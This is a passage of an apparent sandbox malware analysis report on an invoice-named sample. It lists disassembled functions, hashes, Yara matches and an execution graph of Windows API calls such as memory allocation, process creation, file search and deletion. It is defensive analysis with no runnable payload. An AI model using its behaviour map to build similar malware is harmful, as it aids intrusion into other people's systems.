                                                                                                                                        • RTL: Resource at %p, xrefs: 01067B8E
                                                                                                                                        • RTL: Re-Waiting, xrefs: 01067BAC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                        • API String ID: 0-871070163
                                                                                                                                        • Opcode ID: a00c6b35036193e5bfc75c358a3c79139e1dbf1531e6e82adcd3925e028c771e
                                                                                                                                        • Instruction ID: 183cd6f6b0a6c01ebfa89b7759117b3db2db94f35965a8e47ee2aed4d626b1d1
                                                                                                                                        • Opcode Fuzzy Hash: a00c6b35036193e5bfc75c358a3c79139e1dbf1531e6e82adcd3925e028c771e
                                                                                                                                        • Instruction Fuzzy Hash: 2241D2317047029FD760DE29C840F6AB7E9EF98720F100A5DE9DADB681DB72E9058B91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0102B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0106728C
                                                                                                                                        Strings
                                                                                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01067294
                                                                                                                                        • RTL: Resource at %p, xrefs: 010672A3
                                                                                                                                        • RTL: Re-Waiting, xrefs: 010672C1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                        • API String ID: 885266447-605551621
                                                                                                                                        • Opcode ID: e2665ce89643803e7d43585ebf826455858eeebf6471bc4feca4cb8064475b0f
                                                                                                                                        • Instruction ID: 882e1812dc6fc63fba145516fd8fba8d8a3bba8b8228dd895d2ec386396bdebc
                                                                                                                                        • Opcode Fuzzy Hash: e2665ce89643803e7d43585ebf826455858eeebf6471bc4feca4cb8064475b0f
                                                                                                                                        • Instruction Fuzzy Hash: 1041E031700217ABD721DE29CC81FAAB7E9FF94714F140619F9D5AB280DB21F8468BD1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 010A2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                        • String ID: %%%u$]:%u
                                                                                                                                        • API String ID: 48624451-3050659472
                                                                                                                                        • Opcode ID: 012b58330d1a0d9cc94c49f8c079019e95b4ed59e390b56b59dc6eee3e219fc1
                                                                                                                                        • Instruction ID: 743336d6fac4b98134938ca4da3251164e48698b6dd5dc5ef4089e45119a2742
                                                                                                                                        • Opcode Fuzzy Hash: 012b58330d1a0d9cc94c49f8c079019e95b4ed59e390b56b59dc6eee3e219fc1
                                                                                                                                        • Instruction Fuzzy Hash: 4E316873A001199FDB60DE6DDC40BEF77F8EF55610F8545A6E989E7140EB30DA448BA0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01037D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __aulldvrm
                                                                                                                                        • String ID: +$-
                                                                                                                                        • API String ID: 1302938615-2137968064
                                                                                                                                        • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                        • Instruction ID: dc1cabc3237106d8c256fd3009402b58cec379c1b8ef29705d37165cdfe01853
                                                                                                                                        • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                        • Instruction Fuzzy Hash: 069174B1E0021A9EEB64DF6DC8816BEBBF9BFC4720F14465AE995A72C0D73099408761
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FF9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: $$@
                                                                                                                                        • API String ID: 0-1194432280
                                                                                                                                        • Opcode ID: 1401193eb515667a4bfe05dd1ebd37afe9e9427091ffa7adbd5b1d702ecfefe8
                                                                                                                                        • Instruction ID: 98220c52f74fec5a8705318fa8cebd3d67f1bc65a86ed038443adf404ef9d191
                                                                                                                                        • Opcode Fuzzy Hash: 1401193eb515667a4bfe05dd1ebd37afe9e9427091ffa7adbd5b1d702ecfefe8
                                                                                                                                        • Instruction Fuzzy Hash: 2C812C71D0026ADBDB71DB54CC44BEEB7B4AF08714F0041EAAA49B7290E7719E84DFA0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:3.2%
                                                                                                                                        Dynamic/Decrypted Code Coverage:4.3%
                                                                                                                                        Signature Coverage:2.2%
                                                                                                                                        Total number of Nodes:445
                                                                                                                                        Total number of Limit Nodes:73
                                                                                                                                        execution_graph 78789 e09460 78790 e09942 78789->78790 78792 e09ef8 78790->78792 78793 e29920 78790->78793 78794 e29943 78793->78794 78799 e03db0 78794->78799 78796 e2994f 78797 e2997d 78796->78797 78802 e243e0 78796->78802 78797->78792 78806 e12f10 78799->78806 78801 e03dbd 78801->78796 78803 e2443a 78802->78803 78805 e24447 78803->78805 78830 e113a0 78803->78830 78805->78797 78807 e12f27 78806->78807 78809 e12f40 78807->78809 78810 e28800 78807->78810 78809->78801 78812 e28818 78810->78812 78811 e2883c 78811->78809 78812->78811 78813 e28891 78812->78813 78817 e27420 78812->78817 78821 e29c80 78813->78821 78818 e2743d 78817->78818 78824 36b2c0a 78818->78824 78819 e27469 78819->78813 78827 e28110 78821->78827 78823 e288a6 78823->78809 78825 36b2c1f LdrInitializeThunk 78824->78825 78826 36b2c11 78824->78826 78825->78819 78826->78819 78828 e2812a 78827->78828 78829 e2813b RtlFreeHeap 78828->78829 78829->78823 78831 e113db 78830->78831 78846 e17650 78831->78846 78833 e113e3 78844 e116b2 78833->78844 78857 e29d60 78833->78857 78835 e113f9 78836 e29d60 RtlAllocateHeap 78835->78836 78837 e1140a 78836->78837 78838 e29d60 RtlAllocateHeap 78837->78838 78840 e1141b 78838->78840 78845 e114ae 78840->78845 78868 e16460 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 78840->78868 78842 e1166f 78864 e26b00 78842->78864 78844->78805 78860 e141e0 78845->78860 78847 e1767c 78846->78847 78869 e17540 78847->78869 78850 e176c1 78852 e176dd 78850->78852 78855 e27da0 NtClose 78850->78855 78851 e176a9 78853 e176b4 78851->78853 78875 e27da0 78851->78875 78852->78833 78853->78833 78856 e176d3 78855->78856 78856->78833 78883 e280c0 78857->78883 78859 e29d7b 78859->78835 78861 e14204 78860->78861 78862 e14240 LdrLoadDll 78861->78862 78863 e1420b 78861->78863 78862->78863 78863->78842 78865 e26b5a 78864->78865 78867 e26b67 78865->78867 78886 e116d0 78865->78886 78867->78844 78868->78845 78870 e1755a 78869->78870 78874 e17636 78869->78874 78878 e274c0 78870->78878 78873 e27da0 NtClose 78873->78874 78874->78850 78874->78851 78876 e27dbd 78875->78876 78877 e27dce NtClose 78876->78877 78877->78853 78879 e274dd 78878->78879 78882 36b35c0 LdrInitializeThunk 78879->78882 78880 e1762a 78880->78873 78882->78880 78884 e280dd 78883->78884 78885 e280ee RtlAllocateHeap 78884->78885 78885->78859 78889 e116f0 78886->78889 78902 e17920 78886->78902 78888 e11bd5 78888->78867 78889->78888 78906 e20580 78889->78906 78892 e118f1 78914 e2ae90 78892->78914 78894 e1174e 78894->78888 78909 e2ad60 78894->78909 78896 e11906 78898 e11931 78896->78898 78920 e10360 78896->78920 78898->78888 78899 e10360 LdrInitializeThunk 78898->78899 78924 e178c0 78898->78924 78899->78898 78900 e11a5f 78900->78898 78901 e178c0 LdrInitializeThunk 78900->78901 78901->78900 78903 e1792d 78902->78903 78904 e17955 78903->78904 78905 e1794e SetErrorMode 78903->78905 78904->78889 78905->78904 78928 e29bf0 78906->78928 78908 e205a1 78908->78894 78910 e2ad70 78909->78910 78911 e2ad76 78909->78911 78910->78892 78912 e29d60 RtlAllocateHeap 78911->78912 78913 e2ad9c 78912->78913 78913->78892 78915 e2ae00 78914->78915 78916 e29d60 RtlAllocateHeap 78915->78916 78918 e2ae5d 78915->78918 78917 e2ae3a 78916->78917 78919 e29c80 RtlFreeHeap 78917->78919 78918->78896 78919->78918 78921 e1037c 78920->78921 78935 e28020 78921->78935 78925 e178d3 78924->78925 78940 e27330 78925->78940 78927 e178fe 78927->78898 78931 e27f00 78928->78931 78930 e29c21 78930->78908 78932 e27f8a 78931->78932 78934 e27f24 78931->78934 78933 e27fa0 NtAllocateVirtualMemory 78932->78933 78933->78930 78934->78930 78936 e2803a 78935->78936 78939 36b2c70 LdrInitializeThunk 78936->78939 78937 e10382 78937->78900 78939->78937 78941 e273a3 78940->78941 78942 e27354 78940->78942 78945 36b2dd0 LdrInitializeThunk 78941->78945 78942->78927 78943 e273c8 78943->78927 78945->78943 79170 e0b1a0 79171 e29bf0 NtAllocateVirtualMemory 79170->79171 79172 e0c811 79171->79172 78946 e1ece0 78947 e1ed44 78946->78947 78975 e15d00 78947->78975 78949 e1ee74 78950 e1ee6d 78950->78949 78982 e15e10 78950->78982 78952 e1f013 78953 e1eef0 78953->78952 78954 e1f022 78953->78954 78986 e1eac0 78953->78986 78955 e27da0 NtClose 78954->78955 78957 e1f02c 78955->78957 78958 e1ef25 78958->78954 78959 e1ef30 78958->78959 78960 e29d60 RtlAllocateHeap 78959->78960 78961 e1ef59 78960->78961 78962 e1ef62 78961->78962 78963 e1ef78 78961->78963 78964 e27da0 NtClose 78962->78964 78995 e1e9b0 CoInitialize 78963->78995 78966 e1ef6c 78964->78966 78967 e1ef86 78997 e27880 78967->78997 78969 e1f002 78970 e27da0 NtClose 78969->78970 78971 e1f00c 78970->78971 78972 e29c80 RtlFreeHeap 78971->78972 78972->78952 78973 e1efa4 78973->78969 78974 e27880 LdrInitializeThunk 78973->78974 78974->78973 78976 e15d33 78975->78976 78977 e15d57 78976->78977 79001 e27930 78976->79001 78977->78950 78979 e15d7a 78979->78977 78980 e27da0 NtClose 78979->78980 78981 e15dfa 78980->78981 78981->78950 78983 e15e35 78982->78983 79006 e27710 78983->79006 78987 e1eadc 78986->78987 78988 e141e0 LdrLoadDll 78987->78988 78990 e1eafa 78988->78990 78989 e1eb03 78989->78958 78990->78989 78991 e141e0 LdrLoadDll 78990->78991 78992 e1ebce 78991->78992 78993 e141e0 LdrLoadDll 78992->78993 78994 e1ec28 78992->78994 78993->78994 78994->78958 78996 e1ea15 78995->78996 78996->78967 78998 e2789d 78997->78998 79011 36b2ba0 LdrInitializeThunk 78998->79011 78999 e278cd 78999->78973 79002 e2794a 79001->79002 79005 36b2ca0 LdrInitializeThunk 79002->79005 79003 e27976 79003->78979 79005->79003 79007 e2772a 79006->79007 79010 36b2c60 LdrInitializeThunk 79007->79010 79008 e15ea9 79008->78953 79010->79008 79011->78999 79012 e107e0 79013 e107fa 79012->79013 79014 e141e0 LdrLoadDll 79013->79014 79015 e10818 79014->79015 79016 e1085d 79015->79016 79017 e1084c PostThreadMessageW 79015->79017 79017->79016 79173 e27c20 79174 e27cbc 79173->79174 79176 e27c44 79173->79176 79175 e27cd2 NtReadFile 79174->79175 79177 e24da0 79178 e24dfa 79177->79178 79180 e24e07 79178->79180 79181 e22930 79178->79181 79182 e29bf0 NtAllocateVirtualMemory 79181->79182 79184 e22971 79182->79184 79183 e22a76 79183->79180 79184->79183 79185 e141e0 LdrLoadDll 79184->79185 79187 e229b7 79185->79187 79186 e229f0 Sleep 79186->79187 79187->79183 79187->79186 79020 e17f71 79021 e17ef2 79020->79021 79022 e17f76 79020->79022 79022->79021 79024 e169d0 LdrInitializeThunk LdrInitializeThunk 79022->79024 79024->79021 79025 e16df0 79026 e16db4 79025->79026 79027 e16df7 79025->79027 79030 e1a960 79026->79030 79029 e16dc2 79031 e1a986 79030->79031 79032 e1aba5 79031->79032 79057 e281a0 79031->79057 79032->79029 79034 e1a9fc 79034->79032 79035 e2ae90 2 API calls 79034->79035 79036 e1aa18 79035->79036 79036->79032 79037 e1aae9 79036->79037 79038 e27420 LdrInitializeThunk 79036->79038 79040 e15410 LdrInitializeThunk 79037->79040 79041 e1ab08 79037->79041 79039 e1aa74 79038->79039 79039->79037 79042 e1aa7d 79039->79042 79040->79041 79056 e1ab8d 79041->79056 79063 e26ff0 79041->79063 79042->79032 79049 e1aaaf 79042->79049 79051 e1aad1 79042->79051 79060 e15410 79042->79060 79043 e178c0 LdrInitializeThunk 79047 e1aadf 79043->79047 79047->79029 79048 e178c0 LdrInitializeThunk 79052 e1ab9b 79048->79052 79078 e235e0 LdrInitializeThunk 79049->79078 79050 e1ab64 79068 e27090 79050->79068 79051->79043 79052->79029 79054 e1ab7e 79073 e271d0 79054->79073 79056->79048 79058 e281bd 79057->79058 79059 e281ce CreateProcessInternalW 79058->79059 79059->79034 79062 e1544e 79060->79062 79079 e275e0 79060->79079 79062->79049 79064 e27062 79063->79064 79066 e27014 79063->79066 79085 36b39b0 LdrInitializeThunk 79064->79085 79065 e27087 79065->79050 79066->79050 79069 e270ff 79068->79069 79070 e270b1 79068->79070 79086 36b4340 LdrInitializeThunk 79069->79086 79070->79054 79071 e27124 79071->79054 79074 e27242 79073->79074 79076 e271f4 79073->79076 79087 36b2fb0 LdrInitializeThunk 79074->79087 79075 e27267 79075->79056 79076->79056 79078->79051 79080 e2767f 79079->79080 79082 e27601 79079->79082 79084 36b2d10 LdrInitializeThunk 79080->79084 79081 e276c4 79081->79062 79082->79062 79084->79081 79085->79065 79086->79071 79087->79075 79188 e167b0 79189 e167da 79188->79189 79192 e176f0 79189->79192 79191 e16804 79193 e1770d 79192->79193 79199 e27510 79193->79199 79195 e1775d 79196 e17764 79195->79196 79197 e275e0 LdrInitializeThunk 79195->79197 79196->79191 79198 e1778d 79197->79198 79198->79191 79200 e2759d 79199->79200 79201 e27531 79199->79201 79204 36b2f30 LdrInitializeThunk 79200->79204 79201->79195 79202 e275d6 79202->79195 79204->79202 79088 e27270 79089 e272f4 79088->79089 79090 e27294 79088->79090 79093 36b2ee0 LdrInitializeThunk 79089->79093 79091 e27325 79093->79091 79094 e12477 79095 e15d00 2 API calls 79094->79095 79096 e124a3 79095->79096 79097 e1937b 79098 e1938a 79097->79098 79099 e19391 79098->79099 79100 e29c80 RtlFreeHeap 79098->79100 79100->79099 79205 e09400 79207 e0940f 79205->79207 79206 e09450 79207->79206 79208 e0943d CreateThread 79207->79208 79102 e1f5c0 79103 e1f5dd 79102->79103 79104 e141e0 LdrLoadDll 79103->79104 79105 e1f5fb 79104->79105 79209 e1bc00 79211 e1bc29 79209->79211 79210 e1bd2d 79211->79210 79212 e1bcd3 FindFirstFileW 79211->79212 79212->79210 79213 e1bcee 79212->79213 79214 e1bd14 FindNextFileW 79213->79214 79214->79213 79215 e1bd26 FindClose 79214->79215 79215->79210 79216 e16b80 79217 e16bef 79216->79217 79218 e16b9c 79216->79218 79225 e16d18 79217->79225 79227 e15f90 NtClose LdrInitializeThunk LdrInitializeThunk 79217->79227 79218->79217 79219 e27da0 NtClose 79218->79219 79220 e16bb7 79219->79220 79226 e15f90 NtClose LdrInitializeThunk LdrInitializeThunk 79220->79226 79222 e16cf2 79222->79225 79228 e16160 NtClose LdrInitializeThunk LdrInitializeThunk 79222->79228 79226->79217 79227->79222 79228->79225 79106 e27ac0 79107 e27b6c 79106->79107 79109 e27ae8 79106->79109 79108 e27b82 NtCreateFile 79107->79108 79110 e20bc0 79111 e20bdc 79110->79111 79112 e20c04 79111->79112 79113 e20c18 79111->79113 79114 e27da0 NtClose 79112->79114 79115 e27da0 NtClose 79113->79115 79116 e20c0d 79114->79116 79117 e20c21 79115->79117 79120 e29da0 RtlAllocateHeap 79117->79120 79119 e20c2c 79120->79119 79126 e2adc0 79127 e29c80 RtlFreeHeap 79126->79127 79128 e2add5 79127->79128 79229 e25a00 79230 e25a5d 79229->79230 79231 e25a88 79230->79231 79234 e1fee0 79230->79234 79233 e25a6a 79238 e1fca0 79234->79238 79235 e1fed0 79235->79233 79236 e15e10 LdrInitializeThunk 79236->79238 79237 e27880 LdrInitializeThunk 79237->79238 79238->79235 79238->79236 79238->79237 79239 e27da0 NtClose 79238->79239 79239->79238 79129 e155c2 79130 e1554a 79129->79130 79135 e155c5 79129->79135 79131 e27420 LdrInitializeThunk 79130->79131 79132 e15556 79131->79132 79136 e27e40 79132->79136 79134 e1556b 79137 e27ec1 79136->79137 79139 e27e61 79136->79139 79141 36b2e80 LdrInitializeThunk 79137->79141 79138 e27ef2 79138->79134 79139->79134 79141->79138 79240 e12e0c 79241 e17540 2 API calls 79240->79241 79242 e12e1c 79241->79242 79243 e27da0 NtClose 79242->79243 79244 e12e31 79242->79244 79243->79244 79245 e1a491 79246 e1a464 79245->79246 79251 e1a190 79246->79251 79248 e1a46d 79265 e19e30 79248->79265 79250 e1a489 79252 e1a1b5 79251->79252 79276 e17b10 79252->79276 79255 e1a2f2 79255->79248 79257 e1a309 79257->79248 79258 e1a300 79258->79257 79260 e1a3f1 79258->79260 79291 e19890 79258->79291 79262 e1a449 79260->79262 79300 e19bf0 79260->79300 79263 e29c80 RtlFreeHeap 79262->79263 79264 e1a450 79263->79264 79264->79248 79266 e19e46 79265->79266 79273 e19e51 79265->79273 79267 e29d60 RtlAllocateHeap 79266->79267 79267->79273 79268 e19e67 79268->79250 79269 e17b10 GetFileAttributesW 79269->79273 79270 e1a15e 79271 e1a177 79270->79271 79272 e29c80 RtlFreeHeap 79270->79272 79271->79250 79272->79271 79273->79268 79273->79269 79273->79270 79274 e19890 RtlFreeHeap 79273->79274 79275 e19bf0 RtlFreeHeap 79273->79275 79274->79273 79275->79273 79277 e17b31 79276->79277 79278 e17b38 GetFileAttributesW 79277->79278 79279 e17b43 79277->79279 79278->79279 79279->79255 79280 e22210 79279->79280 79281 e2221e 79280->79281 79282 e22225 79280->79282 79281->79258 79283 e141e0 LdrLoadDll 79282->79283 79284 e2225a 79283->79284 79285 e22269 79284->79285 79304 e21ce0 LdrLoadDll 79284->79304 79287 e29d60 RtlAllocateHeap 79285->79287 79290 e22401 79285->79290 79289 e22282 79287->79289 79288 e29c80 RtlFreeHeap 79288->79290 79289->79288 79289->79290 79290->79258 79292 e198b6 79291->79292 79305 e1d0d0 79292->79305 79294 e1991d 79296 e19aa0 79294->79296 79298 e1993b 79294->79298 79295 e19a85 79295->79258 79296->79295 79297 e19750 RtlFreeHeap 79296->79297 79297->79296 79298->79295 79310 e19750 79298->79310 79301 e19c16 79300->79301 79302 e1d0d0 RtlFreeHeap 79301->79302 79303 e19c92 79302->79303 79303->79260 79304->79285 79307 e1d0e6 79305->79307 79306 e1d0f3 79306->79294 79307->79306 79308 e29c80 RtlFreeHeap 79307->79308 79309 e1d12c 79308->79309 79309->79294 79311 e19766 79310->79311 79314 e1d140 79311->79314 79313 e1986c 79313->79298 79315 e1d164 79314->79315 79316 e1d1fc 79315->79316 79317 e29c80 RtlFreeHeap 79315->79317 79316->79313 79317->79316 79142 e16d50 79143 e16d68 79142->79143 79144 e16dc2 79142->79144 79143->79144 79145 e1a960 9 API calls 79143->79145 79145->79144 79318 e15490 79319 e178c0 LdrInitializeThunk 79318->79319 79320 e154c0 79318->79320 79319->79320 79322 e154ec 79320->79322 79323 e17840 79320->79323 79324 e17884 79323->79324 79325 e178a5 79324->79325 79330 e27130 79324->79330 79325->79320 79327 e17895 79328 e178b1 79327->79328 79329 e27da0 NtClose 79327->79329 79328->79320 79329->79325 79331 e2719f 79330->79331 79333 e27151 79330->79333 79335 36b4650 LdrInitializeThunk 79331->79335 79332 e271c4 79332->79327 79333->79327 79335->79332 79151 e273d0 79152 e273ed 79151->79152 79155 36b2df0 LdrInitializeThunk 79152->79155 79153 e27415 79155->79153 79161 e20f50 79162 e20f5f 79161->79162 79163 e20fa3 79162->79163 79166 e20fde 79162->79166 79168 e20fe3 79162->79168 79164 e29c80 RtlFreeHeap 79163->79164 79165 e20fb0 79164->79165 79167 e29c80 RtlFreeHeap 79166->79167 79167->79168 79336 e27d10 79337 e27d79 79336->79337 79339 e27d31 79336->79339 79338 e27d8f NtDeleteFile 79337->79338 79169 36b2ad0 LdrInitializeThunk

                                                                                                                                        Executed Functions

                                                                                                                                        Function 00E09460 Relevance: 50.5, Strings: 40, Instructions: 489COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 26 e09460-e09938 27 e09942-e09946 26->27 28 e09948-e0996d 27->28 29 e0996f-e09979 27->29 28->27 30 e0998a-e09996 29->30 31 e09998-e099a1 30->31 32 e099ae-e099b5 30->32 33 e099a3-e099a6 31->33 34 e099ac 31->34 35 e099e7-e099ee 32->35 36 e099b7-e099e5 32->36 33->34 34->30 38 e09a20-e09a27 35->38 39 e099f0-e09a1e 35->39 36->32 40 e09a59-e09aaa 38->40 41 e09a29-e09a57 38->41 39->35 42 e09abb-e09ac4 40->42 41->38 43 e09ad4-e09ad8 42->43 44 e09ac6-e09ad2 42->44 46 e09ae4-e09aee 43->46 47 e09ada-e09ae1 43->47 44->42 48 e09aff-e09b08 46->48 47->46 49 e09b0a-e09b1c 48->49 50 e09b1e-e09b28 48->50 49->48 52 e09b39-e09b45 50->52 53 e09b47-e09b59 52->53 54 e09b5b-e09b65 52->54 53->52 56 e09b76-e09b82 54->56 57 e09b94-e09b9e 56->57 58 e09b84-e09b8a 56->58 61 e09baf-e09bbb 57->61 59 e09b92 58->59 60 e09b8c-e09b8f 58->60 59->56 60->59 62 e09bd1-e09be4 61->62 63 e09bbd-e09bcf 61->63 66 e09beb-e09bf4 62->66 63->61 67 e09e31-e09e38 66->67 68 e09bfa-e09c04 66->68 70 e09f32-e09f3c 67->70 71 e09e3e-e09e48 67->71 69 e09c15-e09c21 68->69 72 e09c23-e09c2c 69->72 73 e09c39-e09c40 69->73 74 e09e59-e09e65 71->74 75 e09c37 72->75 76 e09c2e-e09c31 72->76 77 e09c61-e09c6b 73->77 78 e09c42-e09c5f 73->78 79 e09e67-e09e7a 74->79 80 e09e7c-e09e86 74->80 75->69 76->75 82 e09c7c-e09c88 77->82 78->73 79->74 84 e09e97-e09ea0 80->84 85 e09ca6-e09cbf 82->85 86 e09c8a-e09c96 82->86 87 e09ea2-e09eb4 84->87 88 e09eb6-e09ec0 84->88 85->85 91 e09cc1-e09cd4 85->91 92 e09ca4 86->92 93 e09c98-e09c9e 86->93 87->84 90 e09ed1-e09edd 88->90 95 e09ef3 call e29920 90->95 96 e09edf-e09ef1 90->96 97 e09ce5-e09cf1 91->97 92->82 93->92 102 e09ef8-e09f02 95->102 98 e09ec2-e09ecb 96->98 100 e09d01-e09d08 97->100 101 e09cf3-e09cff 97->101 98->90 104 e09d0a-e09d3d 100->104 105 e09d3f-e09d4e 100->105 101->97 106 e09f13-e09f1c 102->106 104->100 107 e09d50-e09d57 105->107 108 e09dca-e09dde 105->108 106->70 110 e09f1e-e09f30 106->110 111 e09d59-e09d8c 107->111 112 e09d8e-e09d98 107->112 109 e09def-e09dfb 108->109 113 e09e19-e09e2c 109->113 114 e09dfd-e09e09 109->114 110->106 111->107 116 e09da9-e09db2 112->116 113->66 117 e09e17 114->117 118 e09e0b-e09e11 114->118 119 e09db4-e09dc6 116->119 120 e09dc8 116->120 117->109 118->117 119->116 120->67
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_e00000_replace.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: L$!e$'$)~$*z$.,$0$3$6$7$8=$:$:^$?$C$ExK$I%$My$O$P5$V$Z$\$^^$b$c$h*$n$nr$r6$s|$t$x$z}$|#$}:$1$B$K$X
                                                                                                                                        • API String ID: 0-580166099
                                                                                                                                        • Opcode ID: ddb933d5282744a56018144fcfdbf29360e82efc3acbb3ca706817d0e4aa13bc
                                                                                                                                        • Instruction ID: 25859ab842da975436e7b888120ef0974b1c37b987396c5bcb0b33d5c42bfa3e
                                                                                                                                        • Opcode Fuzzy Hash: ddb933d5282744a56018144fcfdbf29360e82efc3acbb3ca706817d0e4aa13bc
                                                                                                                                        • Instruction Fuzzy Hash: 5852A9B0D05269CBEB24CF45C898BDDBBB1BB85308F2091D9C0497B292D7B91AC9CF45
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00E1BC00 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileW.KERNELBASE(?,00000000), ref: 00E1BCE4
                                                                                                                                        • FindNextFileW.KERNELBASE(?,00000010), ref: 00E1BD1F
                                                                                                                                        • FindClose.KERNELBASE(?), ref: 00E1BD2A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_e00000_replace.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3541575487-0
                                                                                                                                        • Opcode ID: 50f73786ee838472eff2de4eaf51d5b84fb15915995d52bd1371200dd0fcd90b
                                                                                                                                        • Instruction ID: a14607327a231ef99dcf5826762ac01ad0fe0539ba2bf2b3bb06cae260e5f6a2
                                                                                                                                        • Opcode Fuzzy Hash: 50f73786ee838472eff2de4eaf51d5b84fb15915995d52bd1371200dd0fcd90b
                                                                                                                                        • Instruction Fuzzy Hash: 833152B19002487BDB24DB64DC85FFF77BCDB44704F145498B959B7181DB70AAC48BA0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00E27AC0 Relevance: 1.6, APIs: 1, Instructions: 98filenativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00E27BB3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_e00000_replace.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                        • Opcode ID: f1a78f4b55589ddb4294466f29e55b486997b898f0691f297c04de9d46096fe5
                                                                                                                                        • Instruction ID: 34201fc8133d479ee24915c7bb0c670fa4d1557419c653035d986751777cc408
                                                                                                                                        • Opcode Fuzzy Hash: f1a78f4b55589ddb4294466f29e55b486997b898f0691f297c04de9d46096fe5
